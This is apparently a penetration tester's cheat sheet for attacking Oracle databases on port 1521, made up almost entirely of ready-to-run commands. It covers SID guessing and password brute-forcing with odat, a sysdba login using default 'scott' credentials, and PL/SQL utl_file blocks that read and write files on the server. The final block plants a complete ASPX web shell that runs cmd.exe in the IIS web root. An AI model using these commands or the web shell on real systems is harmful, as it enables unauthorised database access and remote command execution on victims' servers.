Oracle SQL | 1521
Oracle SQL cheat sheet
Scan SIDs
odat sidguesser -s 10.10.10.82
Brute force Passwords
odat passwordguesser -s 10.10.10.82 -d XE --accounts-file /usr/share/odat/accounts/accounts.txt
Login to SQPLUS Database
## ------------------| Setup
sudo apt-get install oracle-instantclient-sqlplus
which sqlplus
export ORACLE_HOME=/usr/lib/oracle/19.6/client64/
export LD_LIBRARY_PATH=$ORACLE_HOME/lib
export PATH=$ORACLE_HOME/bin:$PATH
## ------------------| Login as user
sqlplus <USERNAME>/'<PASSWORD>'@<IP>:1521/XE
## ------------------| Login as superuser
sqlplus scott/[email protected]:1521/XE as sysdba
SQLPLUSS Quarries
select * from session_privs;
select * from user_role_privs;
Read File
set serveroutput ON
declare
f utl_file.file_type;
s varchar(5000);
begin
f := utl_file.fopen('/inetpub/wwwroot','iisstart.htm','R');
utl_file.get_line(f,s);
utl_file.fclose(f);
dbms_output.put_line(s);
end;
# Hit enter then type '/' and hit enter
Write File
declare
f utl_file.file_type;
s varchar(5000) := 'h4rithd was there';
begin
f := utl_file.fopen('/inetpub/wwwroot','h4rith.txt','W');
utl_file.put_line(f,s);
utl_file.fclose(f);
end;
# Hit enter then type '/' and hit enter
Write bind shell. (aspx)
declare
f utl_file.file_type;
s varchar(5000) := '<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><HTML><body ><form id="cmd" method="post" runat="server"><asp:TextBox id="txtArg" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" runat="server">Command:</asp:Label></form></body></HTML>';
begin
f := utl_file.fopen('/inetpub/wwwroot','h4rithd.aspx','W');
utl_file.put_line(f,s);
utl_file.fclose(f);
end;
# Hit enter then type '/' and hit enter
Last updated